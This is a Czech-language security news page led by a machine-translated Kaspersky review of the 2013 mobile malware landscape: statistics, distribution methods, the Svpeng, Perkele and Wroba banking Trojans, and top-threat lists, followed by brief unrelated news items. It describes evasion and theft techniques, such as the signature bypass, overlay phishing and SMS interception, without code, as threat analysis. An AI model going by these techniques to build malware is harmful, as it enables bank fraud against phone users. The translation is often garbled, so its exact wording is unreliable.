Existují různé typy subjektů zapojených do mobilního malwaru průmyslu: autoři virů, testery, návrháři rozhraní obou škodlivých aplikací a webových stránek, které jsou distribuovány z, majitelé partnerských programů, které se šíří malware, a majitelé mobilní botnet.
Tato dělba práce mezi zločinci mohou také být viděn v chování jejich trojské koně. V roce 2013, existují důkazy o spolupráci (s největší pravděpodobností na komerční bázi) mezi různými skupinami autory virů. Například, botnet Trojan-SMS.AndroidOS.Opfake.a, kromě své vlastní činnosti, také šířit Backdoor.AndroidOS.Obad.a zasláním spamu obsahující odkaz na malware do seznamu oběti kontaktů.
Nyní je jasné, že zřetelné průmysl vyvinul a je stále více zaměřena na těžebním zisků, což je zřejmé z funkčnosti malware.
2013 v číslech
Bylo zjištěno celkem 143.211 nových úprav škodlivých programů zaměřených na mobilní zařízení ve všech od roku 2013 (od 1.1.2014).
V roce 2013, 3.905.502 instalační balíčky byly využívány zločinci k distribuci mobilního malwaru. Celkově v letech 2012-2013 jsme zjištěna přibližně deset milionů unikátních škodlivých instalačních balíčků:
Počet instalačních balíčků zjištěných v letech 2012-2013
Různé instalační balíčky lze instalovat programy se stejnou funkčností, které se liší pouze z hlediska škodlivého app rozhraní a, například, obsah textových zpráv, které se šíří.
Android je stále terčem zákeřných útoků. 98,05% všech malware detekovaného v roce 2013 zaměřena tuto platformu, což potvrzuje i popularitu tohoto mobilního operačního systému a zranitelnost jeho architektuře.
Distribuce mobilního malware zjištěn v roce 2013 podle platformy
Většina mobilní malware je navržen tak, aby ukrást peníze uživatelů, včetně SMS trojské koně, a spoustou zadních vrátek a trojských koní.
Distribuce mobilního malwaru podle kategorie
V průběhu roku se počet mobilních malware úprav určených pro phishing, krádež informací o kreditních kartách a peníze se zvýšila o faktor 19,7. V roce 2013, mobilní produkty společnosti Kaspersky Lab zabráněno 2500 napadením bankovních trojských koní.
Metody a postupy
2013 došlo nejen radikální nárůst výkonu z mobilního autoři virů, ale také viděl, je aktivně uplatňovat metody a technologie, které dovolily zločinci efektivněji využívat jejich malware. Tam bylo několik různých oblastí, kde mobilní malware podstoupili zálohy.
Distribuce
Počítačoví zločinci využili některých mimořádně sofistikovaných metod infikovat mobilní zařízení.
Infikovat právní webové zdroje napomáhá šíření mobilního malwaru prostřednictvím populárních webových stránkách. Stále více a více chytrých telefonů a tabletů majitelé využívat své zařízení k přístupu na internetové stránky, si neuvědomuje, že i většina renomovaných zdrojů může být počítačový pirát. Podle našich údajů, 0,4% z navštívených webových stránek uživateli našich výrobků byly ohroženy stránky.
Distribuce prostřednictvím alternativních app obchodech . V Asii existuje řada společností, které vyrábějí systémem Android zařízení a Android aplikace, a mnoho z nich nabízí uživateli jeho own App Obchody, která obsahuje programy, které nelze nalézt v Google Play. Čistě nominální kontrolu nad aplikací nahraných na těchto prodejnách znamená, že útočníci mohou skrývat trojské koně v aplikacích vypadat jako nevinné hry nebo utility.
Distribuce prostřednictvím botnetů. Zpravidla bots self-množit zasláním textové zprávy s nebezpečným odkazem na adresy v adresáři oběti. Jsme také registrována jednu epizodu mobilní malware šíří prostřednictvím třetí strany botnet.
Odolnost na ochranu proti malware
Schopnost škodlivého softwaru neustále pracovat na mobilním zařízení oběti je důležitým aspektem jejího vývoje. Čím déle Trojan "žije" na telefonu, tím více peněz to bude pro majitele. To je oblast, kde autoři virů se aktivně pracuje, což má za následek velké množství technologických inovací.
Zločinci jsou stále více využívají mlžení , záměrné jednání o vytvoření komplexní kód, aby je obtížné je analyzovat. Čím složitější je zmatek, tím déle bude trvat antivirové řešení pro neutralizaci škodlivého kódu. Výmluvné je, aktuální spisovatelé virů zvládli komerční obfuskátory. To znamená, že vynaložily značné investice. Například, jeden komerční obfuscator, která stála 350 €, byl použit pro trojské koně a Opfak.bo Obad.a
Android zranitelnosti jsou využívány zločinci ze tří hlavních důvodů: aby se vyhnula kód kontrolu integrity při instalaci aplikace (zranitelnost Master Key), s cílem posílit práva škodlivých aplikací, značně rozšiřují své schopnosti, a aby to více obtížný pro odstranění škodlivého softwaru. Například, Svpeng využívá dosud neznámou zranitelnost se chránit před ručně odstranit nebo antivirového programu.
Počítačoví zločinci také zneužít tuto chybu zabezpečení hlavního klíče a naučili vložit nepodepsané spustitelné soubory v Android instalačních balíčků. Digitální ověření podpisu lze obejít tím, že soubor škodlivý přesně stejný název jako legitimní soubor a umístit jej na stejné úrovni v archivu. Systém ověřuje podpis oprávněného souboru při instalaci souboru škodlivého.
Bohužel, je specifickým rysem Android zabezpečení, které znamená, že je možné pouze se jich zbavit tím, že obdrží aktualizace od výrobce zařízení. Nicméně, mnoho uživatelů se v žádném spěchu aktualizovat operační systémy svých výrobků. Pokud smartphone nebo tablet byla vydána před více než rokem, je to pravděpodobně již není podporován výrobcem a záplatování zranitelností již není k dispozici. V tomto případě, pouze pomoc přichází z antivirové řešení, například Kaspersky Internet Security pro Android.
Vkládání škodlivého kódu do legitimních programů pomáhá zakrýt infekce z oběti. Samozřejmě, že to neznamená, že digitální podpis vývojáře softwaru mohou být použity. Nicméně, vzhledem k neexistenci certifikačních středisek, které ověřují digitální podpisy programy Android, nic nebrání tomu, zločince od přidání vlastního podpisu. Jako výsledek, kopie Angry Birds instalovaných z neoficiálních app store nebo stažených z fóra může snadno obsahovat škodlivý funkčnost.
Možnosti a funkce
V roce 2013, jsme zjistili několik technologických inovací vyvinula a zločinci používají v jejich škodlivého softwaru. Níže jsou uvedeny popisy některých z nejzajímavějších.
Řízení malware z jednoho centra poskytuje maximální flexibilitu. Botnet může výrazně více peněz, než autonomních trojské koně. To přijde jako žádné překvapení, pak, že mnoho SMS-Trojské koně patří funkčnost bot. Podle našich odhadů asi 60% z mobilního malwaru jsou prvky obou velkých a malých mobilních robotických sítí.
Pomocí Google Cloud Zprávy majitelé botnet může pracovat bez serveru C & C, čímž se eliminuje hrozba botnet je detekován a blokován donucovacími orgány. Google Cloud Messaging je navržen tak, aby odeslat krátkou zprávu (do 4 KB) do mobilních zařízení prostřednictvím služby Google. Developer prostě musí zaregistrovat a získat jedinečné ID pro jeho aplikace. Příkazy přijaté přes GCM nelze okamžitě zablokován na infikované zařízení.
Zjistili jsme několik škodlivých programů pomocí GCM pro velení a řízení - rozšířené Trojan-SMS.AndroidOS.FakeInst.a, Trojan-SMS.AndroidOS.Agent.ao, a Trojan-SMS.AndroidOS.OpFake.a mezi ostatními. Google je aktivně bojovat proti tomuto užívání služby, rychle reagovat na zprávy z antivirových společností a blokování identifikátory zločinci.
Útoky na systému Windows XP umožňují mobilní malware infikovat počítač po připojení smartphonu nebo tabletu. Na začátku roku 2013 jsme zjištěny dva stejné aplikace na Google Play, které byly údajně určeny pro čištění operačního systému zařízení se systémem Android od zbytečných procesů. Ve skutečnosti, že aplikace jsou navrženy tak, aby stažení souboru autorun.inf, ikonu souboru a soubor Win32 Trojan, který mobilní škodlivý program vyhledá v kořenovém adresáři SD karty. Na připojení smartphonu v režimu USB disku emulace k počítači se systémem Windows XP, systém automaticky spustí Trojan (pokud AutoPlay na externí médium není zakázán) a je nakažený. Trojan umožňuje zločinci na dálku ovládat počítač oběti a je schopen nahrávat zvuk z mikrofonu. Chtěli bychom zdůraznit, že tento způsob útoku funguje pouze na Windows XP a Android verze před 2.2.
Nejvyspělejší mobilní škodlivé programy jsou dnes trojské koně zaměřené na bankovní účty uživatelů - nejatraktivnější zdroj trestních výdělku.
Trend z roku: mobilní bankovnictví trojské koně
2013 byl poznamenán rychlým nárůstem počtu Android bankovních trojských koní. Cyber průmysl mobilního malwaru je stále více zaměřena na zefektivnění zisku, tj. mobilní phishing, krádež informací o kreditních kartách, převody peněz z bankovních karet do mobilních telefonů a od telefonů na e-peněženek zločinců. Počítačoví zločinci se stali posedlí touto metodou nelegálních příjmů: na začátku roku jsme věděli, že pouze 67 bankovních trojských koní, ale do konce roku to již bylo 1321 unikátních vzorků. Mobilních produktů společnosti Kaspersky Lab zabránit 2.500 infekcí bankovní trojské koně.
Počet mobilních bankovních trojských koní v naší sbírce
Mobilní bankovnictví trojské koně může běžet spolu s Win-32 trojské koně, aby se vyhnula dvoufaktorovou autentizaci - MTAN odcizení (krádež ověřování bankovní kódy, které banky posílají své zákazníky SMS zpráv). Nicméně, v roce 2013, autonomní mobilní bankovnictví trojské koně dále rozvíjet. V současné době jsou tyto trojské koně útoku omezeného počtu klientů bank, ale očekává se, že zločinci budou vymýšlet nové techniky, které jim umožní rozšířit počet a geografii potenciálních obětí.
Infekce způsobené mobilních bankovních programů
Dnes, většina bankovních trojských útoků vliv na uživatele v Rusku a Společenství nezávislých států. Nicméně, tato situace nebude trvat dlouho: vzhledem zájem počítačovými zloději "v uživatelských účtech, činnost mobilních bankovních trojských koní se očekává, že růst v jiných zemích v roce 2014.
Jak bylo uvedeno výše, bankovní trojské koně jsou snad nejsložitější ze všech mobilních hrozeb, a Svpeng je jedním z nejvýraznějších příkladů.
Svpeng
V polovině července jsme zjistili Trojan-SMS.AndroidOS.Svpeng.a, který na rozdíl od svých protějšků SMS trojské koně, je zaměřen na krádeže peněz z bankovního účtu oběti, spíše než z jeho mobilního telefonu. To nemůže jednat samostatně a pracuje přísně v souladu s příkazy obdržel od serveru C & C. Tento škodlivý program se šíří přes SMS spamu a od napadených legitimních stránek, které přesměrovávají mobilním uživatelům se zlými úmysly zdroj. Tam je uživatel vyzván ke stažení a instalaci Trojan napodobujícím aktualizaci Adobe Flash Player.
Svpeng je schopný dělat spoustu věcí.
Shromažďuje informace o telefonu (IMEI, země, poskytovatele služeb, jazyk operačního systému) a odešle ji do počítače prostřednictvím požadavku HTTP POST. To se zdá být nutné určit počet bank, oběť může používat. Svpeng je pouze v současné době útočí na klienty ruských bank. Typicky, nicméně, zločinci první test-run technologii na ruském sektoru na internetu a pak se vrátit na to globálně, útočí na uživatele v jiných zemích.
To krade SMS zpráv a informace o hlasových hovorů. Pomáhá útočník zjistit, které banky vlastníkem smartphone volání - Trojan obdrží seznam telefonních čísel bankovních z jeho C & C serveru.
To krade peníze z bankovního účtu oběti. V Rusku, některé velké banky nabízejí svým klientům speciální službu, která jim umožňuje převést peníze ze svého bankovního karty na jejich mobilní telefonní účet. Zákazníci mají poslat nastavenou textovou zprávu ze svého telefonu na určitý počet bank. Svpeng odešle příslušné zprávy SMS služeb obou bank. Svpeng dělá to pro kontrolu, zda jsou karty z těchto bank jsou připojeny k počtu infikovaných telefonu a zjistit zůstatek na účtu. Je-li telefon připojen k bankovní kartě, příkazy jsou odesílány ze serveru C & C s pokyny k převodu peněz z účtu uživatele na jeho / její mobilní účtu. Mezi zločinci pak odeslat peníze na digitální peněženky nebo na číslo prémie a peníze ji dovnitř
To krade přihlašovací jména a hesla do on-line bankovní účty nahrazením okno zobrazené bankovní aplikace. V současné době, to se týká pouze ruské banky, ale technologie za Svpeng může být snadno použit pro cílové jiných bankovních aplikací.
To krade údaje o bankovním karty (číslo, datum platnosti, CVC2/CVV2) napodobuje proces registraci bankovní kartu s Google Play. Pokud uživatel zahájila Play trhu, Trojan zachycuje události a zobrazí se okno v horní části okna Google Play, vyzve uživatele k zadání jeho / její platební kartě ve falešné okně. Údaje uvedené uživatelem je zaslána zločinci.
Je vymáhá peníze od uživatelů tím, že hrozí zablokovat smartphone: zobrazí zprávu požadující $ 500 odblokovat. Ve skutečnosti, Trojan neblokuje nic a telefon může být použit bez jakýchkoliv problémů.
To h Ides stopy své činnosti zakrývat odchozí a příchozí textové zprávy a blokování hovorů a zpráv z čísla, které patří do banky. Trojan dostane seznam bankovních telefonních čísel z jeho C & C serveru.
Je p rotects se od vypuštění vyžádáním práva správce zařízení během instalace. Jako výsledek, Trojan tlačítko smazat v seznamu aplikací se stane neaktivní, což může způsobit problémy pro nezkušené uživatele. Je nemožné, aby ho zbavit těchto práv bez použití speciálních nástrojů (jako je Kaspersky Internet Security pro Android). Chcete-li chránit sebe před přemístěním, Svpeng využívá dosud neznámou zranitelnost v Android. To používá stejný trik, aby se zabránilo smartphone od vracené do továrního nastavení.
Trojan je distribuován v Rusku a zemích SNS. Ale, jak jsme již zmínili, že zločinci mohli snadno obrátit svou pozornost k uživatelům v jiných zemích.
Perkele a Wroba
Zahraniční uživatelé také byli na přijímacím konci roku více škodlivých inovací zaměřených na bankovní účty.
Perkele Android Trojan nejen útoky ruských uživatelů, ale také klientům z několika evropských bank. Je zajímavé především proto, že funguje ve spojení s různými bankovními Win32 trojské koně. Jeho hlavním úkolem je, aby se vyhnula dvoufaktorovou autentizaci klienta v on-line bankovního systému.
Vzhledem ke specifické povaze své činnosti, Perkele je distribuován v poněkud neobvyklým způsobem. Když uživatel zadá bankovní internetové stránce na počítač napaden bankovní malware (Zeus, Citadela), žádost o počtu smartphone a typ operačního systému, je vstříknut do kódu přihlašovací stránku. Tato data jsou okamžitě zaslán zločinci a počítač zobrazí QR kód s odkazem na údajné certifikátu on-line bankovního systému. Po naskenování QR kód a instalaci komponenty stáhnout z odkazu, uživatel infikuje svůj smartphone s Trojan program, který se může pochlubit funkcí, které je velký zájem útočníků.
Perkele zachycuje mTANs (potvrzení kódy bankovních operací) zaslané bankou prostřednictvím textové zprávy. Pomocí přihlašovací jméno a heslo, ukradené z prohlížeče, Windows Trojan spustí falešnou transakci, zatímco Perkele zachytí (prostřednictvím serveru C & C) MTAN poslal bankou pro uživatele. Peníze pak zmizí z účtu oběti a inkasoval bez vědomí majitele.
Korejský malware Wroba, kromě tradičních vektoru infekce přes soubor-sdílení služeb, se šíří přes alternativní app obchodech. Jakmile se infikuje zařízení, Wroba se chová velmi agresivně. Hledá pro mobilní bankovní aplikace, odstraní je a obrázky padělané verze. Z vnější strany, které jsou k nerozeznání od legitimních aplikací. Nicméně, oni mají žádné bankovní funkce, a jen krást jména a hesla zadaných uživatelem.
TOP 10 mobilní hrozby zjištěné v roce 2013
Jméno * % Ze všech útoků
1 DangerousObject.Multi.Generic 40.42%
2 Trojan-SMS.AndroidOS.OpFake.bo 21.77%
3 AdWare.AndroidOS.Ganlet.a 12.40%
4 Trojan-SMS.AndroidOS.FakeInst.a 10.37%
5 RiskTool.AndroidOS.SMSreg.cw 8.80%
6 Trojan-SMS.AndroidOS.Agent.u 8,03%
7 Trojan-SMS.AndroidOS.OpFake.a 5,49%
8 Trojan.AndroidOS.Plangton.a 5,37%
9 Trojan.AndroidOS.MTK.a 4,25%
10 AdWare.AndroidOS.Hamob.a 3,39%
1.. DangerousObject.Multi.Generic. Tento rozsudek znamená, že jsme si vědomi škodlivého charakteru dané aplikace, ale pro toho či onoho důvodu nejsou poskytovány našim uživatelům s podpisy detekovat. V takových případech, detekce je k dispozici prostřednictvím cloudových technologií realizovaných společností v Security Network Kaspersky, které umožňují naše výrobky minimalizovat čas potřebný k reakci na nové a neznámé hrozby.
2. Trojan-SMS.AndroidOS.OpFake.bo. To je jeden z nejvíce sofistikovaných SMS trojské koně. Jeho charakteristické znaky jsou dobře navržené rozhraní a chamtivost jeho vývojářů. Po spuštění se krade peníze z majitele mobilního zařízení - od $ 9 k celé částky na účet uživatele. Je zde také riziko, telefonní číslo uživatele je zdiskreditovaný, protože Trojan mohou shromažďovat čísla ze seznamu kontaktů a SMS do všech těchto čísel. V malware se zaměřuje především rusko-reproduktory a uživatelů v zemích SNS.
3. AdWare.AndroidOS.Ganlet.a. reklamní modul, který má funkce potřebné pro instalaci dalších aplikací.
4. Trojan-SMS.AndroidOS.FakeInst.a. Tento malware se vyvíjel v průběhu posledních dvou let od jednoduchého SMS Trojan do plně funkčního robota řízeného prostřednictvím různých kanálů (včetně Google Cloud Messaging). Trojan může ukrást peníze z účtu uživatele a odesílat zprávy na čísla v seznamu kontaktů oběti.
5. RiskTool.AndroidOS.SMSreg.cw. Tento platební modul je rozšířený v Číně. To je zahrnuta v různých hrách jako modul pro vytváření on-line nákupy prostřednictvím SMS v rámci aplikace. Odstraňuje textové zprávy s potvrzením od zúčtovacího systému bez vědomí uživatele. Oběti nemám ponětí, peníze byly ukradeny ze svého mobilního telefonu, dokud se zkontrolovat stav.
6.. Trojan-SMS.AndroidOS.Agent.u. Jednalo se o první Trojan používat zranitelnost v OS Android pro získání ZAŘÍZENÍ oprávnění správce, čímž její odstranění velmi obtížný úkol. Kromě toho, že je schopen odmítnout příchozí hovory a volat na jeho vlastní. Možné poškození: odesílání více SMS zpráv s náklady v celkové výši 9 nebo více.
7. Trojan.AndroidOS.Plangton.a. Tento reklamní modul odešle osobní údaje uživatele (bez jejich vědomí) k reklamním serveru, aby to vypadalo jako cílené reklamní kampaně. Výsledná škoda zahrnuje číslo mobilního telefonu uživatele, účtu Google a některé další data jsou diskreditaci. Tento Trojan také libovolně mění domovskou stránku prohlížeče a dodává reklamní záložky.
8. . Trojan-SMS.AndroidOS.OpFake.a Tento multifunkční bot pomáhá distribuovat sofistikované Android malware Backdoor.AndroidOS.Obad.a. složen z těchto dvou je extrémně nebezpečný, protože jeho:
Široká škála možností: krádež identity, posílání textových zpráv na jakékoli číslo. Instalace aplikace, jako by to mohlo vést ke všem peněz, ukradené z mobilního účtu. To může také vyústit v dotčeném telefonní číslo je zdiskreditované po kontaktní čísla ukradené z účtu se používají k posílání textových zpráv. Seznam kontaktů bude také odeslat na server zločince.
extrémně komplexní sebeobranné mechanismy a protiopatření, které brání odstranění. Vzhledem k využití na Android zranitelnosti, to Trojan nelze odstranit bez speciálního programu, jako je KIS pro Android.
Je třeba poznamenat, že Trojan-SMS.AndroidOS.OpFake.a je rozložena na větší geografickou oblast než ostatní Top 10 vůdců. Často se zaregistrovat pokusy infikovat zařízení, a to nejen v zemích SNS, ale také v Evropě.
9. Trojan.AndroidOS.MTK.a. Jedná se o sofistikovaný Trojan program s širokou funkčnost a sofistikovaných metod šifrování přenosu. Jeho hlavním úkolem je spustit nebezpečné aplikace, které byly staženy do infikovaného zařízení.
10. AdWare.AndroidOS.Hamob.a je reklamní aplikace napodobovat legitimní programy (pomocí názvu a ikony, např. WinRAR), zatímco jeho jedinou funkcí je zobrazení reklamy.
Top 10 zahrnuje čtyři SMS trojské koně, i když některé z nich mají kontrolní mechanismy, které přeměňují infikované zařízení do roboty.
Geografie hrozeb
Země, kde se uživatelé setkávají největší riziko mobilního malware
(procento všech napadených unikátních uživatelů)
Top 10 zemí podle počtu napadených unikátních uživatelů:
Země % Ze všech napadených unikátních uživatelů
1 Rusko 40.34%
2 Indie 7,90%
3 Vietnam 3,96%
4 Ukrajina 3,84%
5 Spojené království 3,42%
6 Německo 3,20%
7 Kazachstán 2,88%
8 Spojené státy americké 2.13%
9 Malajsie 2.12%
10 Írán 2,01%
Mobilní hrozby mají vlastnosti specifické pro tento region - útočníci používají různé kategorie mobilního malwaru v závislosti na regionu nebo zemi. Níže je uvedeno několik příkladů distribuci mobilního malwaru podle země.
Rusko
V Rusku, mobilní počítačová kriminalita je zvláště převládající - 40,3% ze všech uživatelů zaútočili na celém světě v roce 2013 se nachází v této zemi.
Top 5 rodin z mobilního malware distribuovaných v Rusku
Rodina % Ze všech napadených unikátních uživatelů
Trojan-SMS.AndroidOS.OpFake 40.19%
Trojan-SMS.AndroidOS.FakeInst 28.57%
Trojan-SMS.AndroidOS.Agent 27.11%
DangerousObject.Multi.Generic 25.30%
Trojan-SMS.AndroidOS.Stealer 15.98%
V roce 2013 Rusko opět vedl v počtu infekcí SMS Trojan a v současné době žádné známky toho, že se situace zlepší. Jak již bylo uvedeno výše, většina mobilních bankovních trojských koní zaměřit ruské uživatele.
Rusko a země SNS často slouží jako zkušební terén pro nové technologie: když zdokonalil své technologie v ruské jazykové oblasti internetu, se zločinci pak obrátit svou pozornost k uživatelům v jiných zemích.
Německo
Německo je jednou ze zemí západní Evropy, kde SMS trojské koně jsou velmi aktivní. V roce 2013 byla Evropa jasně cíl pro ruské autory virů, protože jejich zpeněžení podvody zahrnující textové zprávy odesílané na prémiová čísla funguje dobře v tomto regionu. V Německu jsme zaznamenali neustálé pokusy o SMS Trojan infekce, zejména Agent malware rodiny.
Mobilní bankovní trojské koně jsou také aktivně používá v této zemi: Německo zaujímá první místo mezi západoevropských zemí podle počtu unikátních uživatelů napadených (6. místo ve světovém hodnocení).
Top 5 rodin z mobilního malwaru distribuován v Německu
Rodina % Ze všech napadených unikátních uživatelů
RiskTool.AndroidOS.SMSreg 25.88%
DangerousObject.Multi.Generic 20.83%
Trojan-SMS.AndroidOS.Agent 9,25%
Trojan.AndroidOS.MTK 8,58%
AdWare.AndroidOS.Ganlet 5,92%
USA
Situace v USA je jiný. Nejsou žádné zpeněžení podvody týkající textových zpráv, což znamená, že není jasné dominance mobilních SMS trojské koně. Vůdci jsou roboty sběr dat o infikovaných smartphony.
Top 5 rodin z mobilního malware distribuovaných v USA
Rodina % Ze všech napadených unikátních uživatelů
DangerousObject.Multi.Generic 19.75%
RiskTool.AndroidOS.SMSreg 19.24%
Monitor.AndroidOS.Walien 11.24%
Backdoor.AndroidOS.GinMaster 8,05%
AdWare.AndroidOS.Ganlet 7,29%
Čína
V Číně existuje mnoho reklamních modulů integrovaných do čistých a dokonce i škodlivé aplikace. Funkce reklamních modulů jsou různorodé, dokonce jít tak daleko, jak stahování škodlivého softwaru telefonu oběti. SMS trojské koně a zadní vrátka jsou také velmi populární v Číně.
Top 5 rodin z mobilního malware distribuovaných v Číně
Rodina % Ze všech napadených unikátních uživatelů
RiskTool.AndroidOS.SMSreg 46.43%
AdWare.AndroidOS.Dowgin 19.18%
DangerousObject.Multi.Generic 13.89%
Trojan-SMS.AndroidOS.Agent 10.55%
Trojan.AndroidOS.MTK 10.13%
Závěr
Škodlivý software, který útočí na uživatele mobilních bankovních účtů se stále vyvíjí a počet programů, rychle roste. Je zřejmé, že tento trend bude pokračovat, s více mobilních bankovních trojských koní a nových technologií, aby se zabránilo detekci a odstranění.
Ze všech mobilních vzorků malwaru zjištěných v roce 2013, boty byly nejpočetnější kategorií. Útočníci jsou jasně vidět výhody mobilních robotických sítí, pokud jde o vytváření zisku. Nové mechanismy pro řízení mobilních botnetů se mohou objevit v blízké budoucnosti.
V roce 2014 očekáváme zranitelnosti ve všech typech aktivně využívaných dát malware root přístup k zařízení, takže odstranění ještě obtížnější.
2013 viděl poprvé zaregistrován malware útok na počítače spouští z mobilního zařízení. Počasí jsme budoucích Wi-Fi útoky z mobilních zařízení na sousedních stanic a širší infrastruktuře.
SMS trojské koně jsou pravděpodobně zůstanou mezi mobilními malware vůdců a dokonce dobýt nové území.
WD nabízí pevné disky optimalizované pro dohledová řešení
26.2.2014 Bezpečnost
Dostupnost 3,5"pevných disků Purple, které jsou určené speciálně pro záznam streamovaného videa, oznámila firma WD.
Novinka je navržena pro ukládání videozáznamů z kamerových dohledových systémů a jsou tak vhodné do zabezpečovacích systémů v domácnostech, domácích kancelářích i malých firmách, kde se používá až 32 kamer s rozlišením HD. Nové disky se dodávají v kapacitách od 1 TB až po 4 TB.
Disky WD Purple nabízejí oproti běžným HDD nižší spotřebu energie a podle výrobce mají mnoho funkcí, které byly dříve vyhrazené pro úložiště na úrovni podnikových řešení.
„WD optimalizovalo produktovou řadu WD Purple pro aplikace bezpečnostních zařízení. Dosahujeme tak vylepšeného přehrávání videozáznamu ve vysokém rozlišení, při nepřetržité - 24/7 - pracovní zátěži v prostředí kamerových sledovacích systémů,” říká Matt Rutledge, senior viceprezident WD.
Disky se snadno se integrují do nových ale i stávajících bezpečnostních systémů a jsou kompatibilní se šasi a čipovými sadami předních výrobců. Doporučená cena činí 69 eur (1TB verze) až 159 eur (za 4TB variantu).
Trh se zabezpečovacími kamerovými systémy jednoznačně přechází od analogových kamer k síťovým, říká Jon Cropley, analytik společnosti IHS Technology.
Podle něj zvyšování rozlišení, dynamický rozsah záznamu a funkcionality pro denní a noční záznam přinášejí stále vyšší požadavky na ukládací řešení, která tak musí být schopna uložit stále větší objemy videozáznamu.”
Technologie v nových discích WD Purple podle výrobce:
AllFrame – Tato technologie využívá streamování prostřednictvím rozhraní ATA, pomáhá eliminovat ztrátu záznamu a zlepšuje přehrávání a datový tok. Firmware disků WD Purple zabraňuje pixelaci obrazu a výpadkům nahrávání.
Advanced Format Technology (AFT) –umožňuje zvyšovat hustotu zápisu a byla přijata společností WD i dalšími výrobci disků. Zajišťuje zvyšování kapacity.
Autentizace od Esetu nabízí vylepšenou integraci s firemním IT
26.2.2014 Bezpečnost
Dvoufaktorovou autentizaci vylepšil Eset – nabídne díky SDK a API rozšířené možnosti integrace i jednodušší správu.
Eset uvedl na náš trh druhou verzi svého řešení ESA (Eset Secure Authentication). Uživatelům zprostředkuje bezpečný přístup k on-line aplikacím, zatímco firemním administrátorům snazší instalaci i podporu.
ESA nabízí bezpečný přístup ke kritickým aplikacím jako je například Microsoft SharePoint Server nebo Microsoft Dynamics. Navíc přináší široké možnosti integrace i s dalšími aplikacemi, a to díky vývojářské sadě (SDK) či programovému API rozhraní.
„Možnost integrace do stávajícího IT prostředí je pro autentizační řešení klíčová. Jen tak je totiž možné jednoduše posílit zabezpečení dat a systémů i na úrovni transakcí a zvýšit tak odolnost IT proti cíleným útokům - ať už jde o prolomení hesla hrubou silou nebo o zneužití identity legitimního uživatele,“ říká Miroslav Dvořák, technický ředitel Esetu.
Secure Authentication je podle něj také vhodným řešením pro malé a střední podniky, které hledají řešení, která jsou nákladově efektivní a je k nim dostupná i lokální podpora.
IOS SSL zranitelnost také v OS X
25.2.2014 OSX
Pátek Apple vydal aktualizaci IOS , na verzi 7.0.6 a 6.16, opravit chybu ověřování SSL. Indikace je, že tato chyba je snadno zneužitelná, takže tato aktualizace by měla být uplatňována co nejdříve praktické. Apple také uvedl, že tato chyba se zobrazí také v OS X a že oprava je "brzy". Do té doby buďte opatrní, kde si procházet se stroji váš OS X Windows.
Adam Langley na ImperialViolet blogu vytvořila testovací stránky , které vám pomohou zjistit, zda váš prohlížeč je zranitelné vůči tomuto útoku. Pokud můžete načíst obsah z testovací stránky, kterou jsou v nebezpečí, chyba označuje, byste měli být v pořádku.
Na mých dvou strojích založených OS X s aktuální verzí Firefoxu, Chrome a Safari, jen Safari zobrazuje zranitelnost. Oba Chrome a Firefox se zdá být v pořádku. Níže je výstup Firefox.
Chrome právě zobrazena jeho "Tato webová stránka není dostupná" Chyba.
Výzkumníci zjistili, že chyba je způsobena potulný příkazu goto . Uvědomil jsem si, že i když bylo dosaženo pokroku, efektivní recenzi kód, pokrytí kódu, a kód regresní proces a nástroje i nadále výzvou vývoj softwaru, ale to se zdá jako snadná chytit.
Váš Facebook účet získal cenu!
25.2.2014 Sociální sítě
Existuje spousta podvodných zpráv s obsahem v duchu "vaše e-mailová adresa vyhrál milion dolarů v loterii, prosím, kontaktujte nás vyzvednou cenu". Internet podvodníci používají tento trik, aby přimět uživatele k rozdávání peněz: dříve, než oni mohou tvrdit, svou údajnou výhru jen "šťastní výherci" muset platit daň nebo bankovní poplatek za převod peněz, atd.
Nyní jsme narazili na zajímavou variací tohoto triku, který zahrnuje Facebook účtu namísto e-mailovou adresu.
A teď, proč Eduardo Saverin (skutečná osoba a jeden ze zakladatelů Facebook), je třeba vědět, že má Facebook uživatelské jméno, pokud můj účet již vyhrál cenu? Ale nic netušící uživatele, oslepen příslibem obrovské ceny, nemusí přemýšlet o tom, že - a to je to, co podvodníci spoléhají na.
Jsem si jist, že čtenáři tohoto blogu by neměla klesnout na něco jako "Facebook ceny", ale naši příbuzní a přátelé mají účty příliš, a oni nemusí být tak zkušený v tom, jak on-line podvody. To je důvod, proč by měli být varováni, že tyto dopisy nejsou nic jiného než podvod.
První Tor Trojan pro Android
25.2.2014 Mobil
Autoři virů z Android trojské koně tradičně používají funkcionalitu malware Windows jako šablonu. Nyní ještě další technika z Windows trojské koně byl realizován v malware pro Android: poprvé jsme zjistili Android Trojan, který používá doménu v cibule pseudo zóny jako C & C.. Trojan využívá anonymní sítě Tor postavený na síti proxy serverů. Stejně jako poskytuje uživatelům s anonymitou, Tor umožňuje zobrazit "anonymní" stránky v doméně. Cibule zóny, která je přístupná pouze v Tor.
Backdoor.AndroidOS.Torec.a je variace na populární klient Orbot Tor. Mezi zločinci přidali vlastní kód aplikace, ale Trojan neprojde sám vypne jako Orbot - jednoduše používá funkčnost klienta.
Trojan může zobrazit následující příkazy z C & C:
start / stop zachytí příchozí SMS
start / stop odcizení odchozí SMS
provést požadavek USSD
posílat data v telefonu na C & C (telefonní číslo, země, IMEI, model, verzi OS)
Poslat C & C seznam aplikací instalovanou na mobilním zařízení
pošlete SMS na číslo zadané v příkazu
Tam jsou výhody a nevýhody použití Tor. Na straně plus, to je nemožné, aby vypnutí C & C. Jednou z hlavních nevýhod, nicméně, je potřeba pro další kód. Pro Backdoor.AndroidOS.Torec.a používat Tor bude mít zapotřebí mnohem více kódu, než je nutné pro vlastní funkčnost.
Blackphone chystá telefony odolné vůči špehování NSA
25.2.2014 Mobil
Švýcarský start-up připravuje další chytré telefony umožňující vést šifrovanou komunikaci.
Blackphone se dosud prezentoval jediným zařízením nabízejícím ochranu proti špehování. Na veletrhu MWC v Barceloně ale nyní společnost informovala o svém záměru uvést hned celou řadu podobných telefonů. „Nepůjde o jediné zařízení. Připravujeme i další bezpečné a soukromí chránící telefony,“ řekl jeden ze zakladatelů společnosti Jon Callas.
V současné době Blackphone doufá v úspěch stejnojmenného telefonu, který půjde do prodeje letos v červnu za cenu 629 dolarů a které si již zájemci mohou předběžně objednat na webu společnosti. Půjde o zařízení, které se vzhledem nijak neliší od běžného smartphonu s Androidem.
